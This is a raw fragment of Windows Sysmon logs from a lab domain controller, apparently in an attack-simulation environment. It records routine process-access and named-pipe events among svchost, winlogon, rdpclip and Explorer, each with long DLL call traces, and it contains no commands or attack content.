2\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441056Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.114{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441055Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.113{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-D4CE-6086-F004-00000000BA01}2052C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000441054Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.113{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-0E00-00000000BA01}1016C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 18141800x8000000000000000441053Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-ConnectPipe2021-04-27 12:24:44.113{42DC5269-CE99-6086-0E00-00000000BA01}1016\TSVCPIPE-69b67095-441f-4faa-93f1-e17fb1a8b219C:\Windows\System32\svchost.exe 10341000x8000000000000000441052Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.106{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441051Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.106{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2b2a|c:\windows\system32\SYSNTFY.dll+15cd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49e78|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441050Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.106{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+48674|C:\Windows\System32\RPCRT4.dll+31850|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000441049Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-ConnectPipe2021-04-27 12:24:44.102{42DC5269-CE99-6086-0E00-00000000BA01}1016\TSVCPIPE-69b67095-441f-4faa-93f1-e17fb1a8b219C:\Windows\System32\svchost.exe 18141800x8000000000000000441048Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-ConnectPipe2021-04-27 12:24:44.100{42DC5269-CE99-6086-0E00-00000000BA01}1016\TSVCPIPE-69b67095-441f-4faa-93f1-e17fb1a8b219C:\Windows\System32\svchost.exe 10341000x8000000000000000441047Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.100{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441046Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.092{42DC5269-D4D0-6086-FD04-00000000BA01}11443976C:\Windows\Explorer.EXE{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x8000000000000000441045Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.092{42DC5269-D4D0-6086-FD04-00000000BA01}11443976C:\Windows\Explorer.EXE{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x8000000000000000441044Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.090{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441043Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.089{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441042Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.089{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441041Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.088{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441040Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.088{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441039Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.087{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441038Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.087{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000441037Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-ConnectPipe2021-04-27 12:24:44.087{42DC5269-CE99-6086-0E00-00000000BA01}1016\TSVCPIPE-69b67095-441f-4faa-93f1-e17fb1a8b219C:\Windows\System32\svchost.exe 10341000x8000000000000000441036Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.086{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441035Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.086{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441034Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.086{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441033Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.085{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441032Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.085{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441031Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.085{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|c:\windows\system32\lsm.dll+23fc9|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441030Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 